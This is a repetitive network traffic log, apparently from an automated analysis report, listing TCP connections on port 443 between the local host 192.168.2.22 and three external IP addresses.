Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
